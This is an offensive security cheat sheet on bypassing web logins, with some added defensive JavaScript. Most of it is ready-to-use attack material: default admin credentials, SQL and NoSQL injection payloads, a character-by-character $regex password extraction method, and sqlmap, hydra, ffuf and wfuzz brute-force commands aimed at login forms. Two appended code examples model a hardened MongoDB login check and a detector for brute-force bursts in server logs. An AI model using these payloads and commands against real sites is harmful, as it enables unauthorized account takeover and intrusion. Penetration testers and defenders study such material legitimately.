Web Login Bypass
Last modified: 2023-08-31
Common Default Credentials
Check whether the website still uses the default username/password.
admin:admin
admin:password
admin:password1
admin:password123
admin:passw0rd
admin:(empty)
admin:12345
administrator:password
administrator:password1
administrator:password123
administrator:passw0rd
administrator:(empty)
administrator:12345
# phpIPAM
admin:ipamadmin
Admin:ipamadmin
# PHPMyAdmin
root:(null)
root:password
SQL Injections
' or '1'='1
' or '1'='1--
or true--
' or true--
UNION SELECT null--
' UNION SELECT null--
' UNION SELECT 1,2--
Microsoft, Oracle, PostgreSQL
'--
' or 1=1--
' or '1'='1'--
}" or 1=1--
MySQL
'-- -
'#
' or 1=1#
' or 1=1-- -
' or '1'='1'-- -
' or '1'='1'#
}" or 1=1-- -
NoSQL Injection
Mongo
' || 1==1//
' || 1==1%00
' || '1==1
' || '1'=='1
Operators
# $ne: Not equal
username[$ne]=xyz&password[$ne]=xyz

# $regex: Regular expressions
username[$regex]=.*&password[$regex]=.*
username[$regex]=^xyz&password[$regex]=^xyz
username[$regex]=^a.*$&password[$ne]=xyz
username[$regex]=.{6}&password[$ne]=xyz
username[$regex]=^.{1}&password[$regex]=^.{1} # Length of values

# $exists: Exists in the database
username[$exists]=true&password[$exists]=true

# $nin: Not in
username[$nin][admin]=admin&password[$ne]=xyz
# If we found that "admin" exists, we can exclude "admin" with the $nin operator.
username[$nin][]=admin&password[$ne]=xyz
# If more users are found, exclude them as well.
username[$nin][]=admin&username[$nin][]=john&password[$ne]=xyz

# $gt: Greater than
username[$gt]=s&password[$gt]=s

# $lt: Lower than
username[$lt]=s&password[$lt]=s

# Combinations
username[$ne]=xyz&password[$regex]=.*
username[$exists]=true&password[$ne]=xyz
username[$ne]=xyz&password[$exists]=true
username[$regex]=.*&password[$ne]=xyz
username[$regex]=.{6}&password[$ne]=xyz
After finding usernames, we can also recover the passwords with the "$regex" operator, as in the following example.
# Check if the password length is 7 characters.
username=admin&password[$regex]=^.{7}$
# If not, change 7 to 6 (or 8, or another number).
username=admin&password[$regex]=^.{6}$
# If the password turns out to be 6 characters, brute force the characters one by one.
username=admin&password[$regex]=^a.....$
username=admin&password[$regex]=^s.....$
username=admin&password[$regex]=^se....$
username=admin&password[$regex]=^sec...$
Operators in JSON
If the above payloads do not work, try the JSON format.
We also need to set Content-Type to "application/json" in the HTTP header.
Content-Type: application/json

{"username": { "$ne": "xyz" }, "password": { "$ne": "xyz" }}
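The operator payloads above, and their JSON variant, only work because the parsed field reaches the database as an object rather than a string. The following added example (not from this cheat sheet) models such a handler: a vulnerable filter builder beside a hardened one that rejects non-string credentials, replayed against a constructed user store with the $ne and $regex payloads. parseFormBody, matches and USERS are constructed stand-ins for qs/Express-style parsing and MongoDB matching, not library code.

```javascript
// Added example, not from the original cheat sheet: models why payloads such as
// username[$ne]=xyz&password[$ne]=xyz or password[$regex]=^.{6}$ log in when a
// handler forwards parsed form/JSON fields straight into a MongoDB filter, and how
// a type check stops them. Parser and matcher are constructed imitations of
// qs/Express-style query parsing and Mongo filter evaluation, not library code.

// Parse "key=value" plus one level of "key[sub]=value" bracket notation.
function parseFormBody(body) {
  const out = {};
  for (const pair of body.split("&")) {
    const [rawKey, rawVal = ""] = pair.split("=");
    const key = decodeURIComponent(rawKey), val = decodeURIComponent(rawVal);
    const m = /^([^\[]+)\[([^\]]+)\]$/.exec(key);
    if (m) (out[m[1]] = out[m[1]] || {})[m[2]] = val; // username[$ne]=xyz -> {username:{$ne:"xyz"}}
    else out[key] = val;
  }
  return out;
}
// A JSON body (Content-Type: application/json) yields the same operator objects.
function parseBody(body) {
  return body.trimStart().startsWith("{") ? JSON.parse(body) : parseFormBody(body);
}
// Vulnerable: whatever the parser produced, object or string, becomes the filter.
function buildFilterVulnerable(f) {
  return { username: f.username, password: f.password };
}
// Hardened: credentials must be plain strings, so operator objects never reach the driver.
function buildFilterSafe(f) {
  if (typeof f.username !== "string" || typeof f.password !== "string") {
    throw new TypeError("username and password must be strings");
  }
  return { username: f.username, password: f.password };
}
// Minimal model of Mongo filter evaluation for the operators used above.
function matches(doc, filter) {
  return Object.entries(filter).every(([field, cond]) => {
    const v = doc[field];
    if (typeof cond !== "object" || cond === null) return v === cond;
    return Object.entries(cond).every(([op, arg]) =>
      op === "$ne" ? v !== arg : op === "$regex" ? new RegExp(arg).test(String(v))
      : op === "$gt" ? v > arg : op === "$lt" ? v < arg : false);
  });
}
const USERS = [{ username: "admin", password: "secret" }]; // constructed user store
// Returns the matched user or null; the hardened builder throws on operator input.
function login(body, buildFilter) {
  const filter = buildFilter(parseBody(body));
  return USERS.find((u) => matches(u, filter)) || null;
}
```

With buildFilterVulnerable, the $ne payload matches the admin document and password[$regex]=^.{6}$ confirms the password length; with buildFilterSafe the same bodies are rejected before any query runs.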
SQL Injection with SQLmap
Alternatively, we can automate SQLi using sqlmap.
# 'req.txt' is the raw request saved from Burp Suite (right-click the request and choose `save item`).
sqlmap -r req.txt
sqlmap -r req.txt --risk 2 --level 5
sqlmap -r req.txt --risk 3 --level 5
See the SQL Injection with Sqlmap page for details.
Wildcard Brute Force
If the login accepts a wildcard (*), you may be able to find the username/password by brute force.
username = *
password = *
For example, in Turbo Intruder (Burp Suite), attempt logins with alphanumeric characters one at a time.
username=%s*&password=*
# or
username=*&password=%s*
My favorite wordlist for this is from SecLists:
https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/alphanum-case-extra.txt
Brute Force Credentials
Before brute forcing, we need wordlists.
Generate the custom wordlist from the target web page.
cewl https://vulnerable.com > scraped_words.txt
If we can make a reasonable guess at the target password, we can generate variants of it with hashcat rules.
echo -n 'passw0rd' > password.txt
hashcat --stdout password.txt -r /usr/share/hashcat/rules/best64.rule > passlist.txt
Using Ffuf
# -fc: Filter HTTP status code
ffuf -w passwords -X POST -d "username=admin&password=FUZZ" -u http://vulnerable.com/login -fc 401
# Basic Auth
ffuf -u https://admin:FUZZ@example.com/ -w wordlist.txt -fc 401
We can also use a raw request file from Burp Suite.
- Send request in Burp Suite.
- Right-click on the request screen.
- Click "Copy to file" in the menu.
- Edit the raw file, replacing the target value with the "FUZZ" keyword.
After that, we can use it in the ffuf command.
# Iterate with a Burp Suite raw request (-x proxies through Burp)
ffuf -u http://example.com/login -request raw.txt -x http://127.0.0.1:8080 -w wordlist.txt
Using Hydra
# Cracking username
hydra -L usernames.txt -p password vulnerable.com http-post-form "/login:username=^USER^&password=^PASS^:Invalid username"
# Cracking password
hydra -l username -P passwords.txt vulnerable.com http-post-form "/login:username=^USER^&password=^PASS^:Invalid password"
# HTTPS (https-post-form)
hydra -L usernames.txt -P passwords.txt vulnerable.com https-post-form "/login:username=^USER^&password=^PASS^:Username or password is incorrect"
# Cracking Basic authentication credentials (Authorization / WWW-Authenticate headers).
hydra -L usernames.txt -P passwords.txt <target-ip> http-get
Using Wfuzz
# Cracking username
wfuzz -z file,./usernames.txt -d "username=FUZZ&password=password" https://example.com/login
# Cracking password
wfuzz -z file,./passwords.txt -d "username=admin&password=FUZZ" https://example.com/login
# Range: 00-99 -> "password00", "password01", ..., "password99"
# -t: N threads
# -s: Delay of N seconds between requests
wfuzz -z range,00-99 -d "username=admin&password=passwordFUZZ&submit=Submit" -X POST -u https://example.com/login -t 1 -s 20
# -- Options --------------------------------------------------------------------------------------------
# --hc: Hide the specific status code
wfuzz -z file,./usernames.txt -d "username=FUZZ&password=password" --hc 302 http://example.com/login
# --hh: Hide the specific chars (Content-Length)
wfuzz -z file,./passwords.txt -d "username=admin&password=FUZZ" --hh 783 http://example.com/login
# --sc: Show the specific status code
wfuzz -z file,./usernames.txt -d "username=FUZZ&password=password" --sc 302 http://example.com/login
# --sh: Show the specific chars (Content-Length)
wfuzz -z file,./passwords.txt -d "username=admin&password=FUZZ" --sh 1214 http://example.com/login
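From the defending side, the ffuf/hydra/wfuzz runs above leave a characteristic trace in the web server log: a burst of POSTs to the login path from one client, almost all failing with the same response size (the very thing -fc and --hh filter on). The following added example (not part of this cheat sheet) flags that pattern over constructed access-log lines; the combined log format, the /login path, the 4xx-means-failure rule and the threshold of 5 are assumptions.

```javascript
// Added example, not from the original cheat sheet: a detector for the login
// brute force pattern that the ffuf/hydra/wfuzz commands above produce, run over
// constructed access-log lines (combined log format assumed). A burst of POST
// requests to the login path from one client, almost all failing with the same
// response size, is the signature to alert on.
const LOG_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\d+|-)/;
// Constructed sample: 10.0.0.5 logs in normally; 10.0.0.9 guesses five passwords
// (identical 783-byte failure pages) and then succeeds.
const SAMPLE_LOG = [
  '10.0.0.5 - - [31/Aug/2023:10:00:01 +0000] "POST /login HTTP/1.1" 302 0',
  '10.0.0.9 - - [31/Aug/2023:10:00:02 +0000] "POST /login HTTP/1.1" 401 783',
  '10.0.0.9 - - [31/Aug/2023:10:00:02 +0000] "POST /login HTTP/1.1" 401 783',
  '10.0.0.9 - - [31/Aug/2023:10:00:03 +0000] "POST /login HTTP/1.1" 401 783',
  '10.0.0.9 - - [31/Aug/2023:10:00:03 +0000] "POST /login HTTP/1.1" 401 783',
  '10.0.0.9 - - [31/Aug/2023:10:00:04 +0000] "POST /login HTTP/1.1" 401 783',
  '10.0.0.9 - - [31/Aug/2023:10:00:05 +0000] "POST /login HTTP/1.1" 302 0',
].join("\n");

function parseLine(line) {
  const m = LOG_RE.exec(line);
  return m && { ip: m[1], method: m[3], path: m[4], status: Number(m[5]), bytes: m[6] };
}

// Per client IP: POSTs to loginPath split into failures (4xx) and others, plus the
// set of failure response sizes; one dominant size is what -fc/--hh filter on.
function summarizeLoginPosts(logText, loginPath = "/login") {
  const perIp = new Map();
  for (const line of logText.split("\n")) {
    const r = parseLine(line);
    if (!r || r.method !== "POST" || r.path !== loginPath) continue;
    const s = perIp.get(r.ip) || { failures: 0, others: 0, sizes: new Set() };
    if (r.status >= 400 && r.status < 500) { s.failures++; s.sizes.add(r.bytes); }
    else s.others++;
    perIp.set(r.ip, s);
  }
  return perIp;
}

// Clients at or above the failure threshold; a success after the burst is reported
// too, since that is the hit the tools stop on. Apps answering failures with 200
// need the size-based variant instead (few distinct sizes over many POSTs).
function findBruteForcers(logText, threshold = 5) {
  const hits = [];
  for (const [ip, s] of summarizeLoginPosts(logText)) {
    if (s.failures >= threshold) {
      hits.push({ ip, failures: s.failures, distinctSizes: s.sizes.size, successAfter: s.others > 0 });
    }
  }
  return hits;
}
```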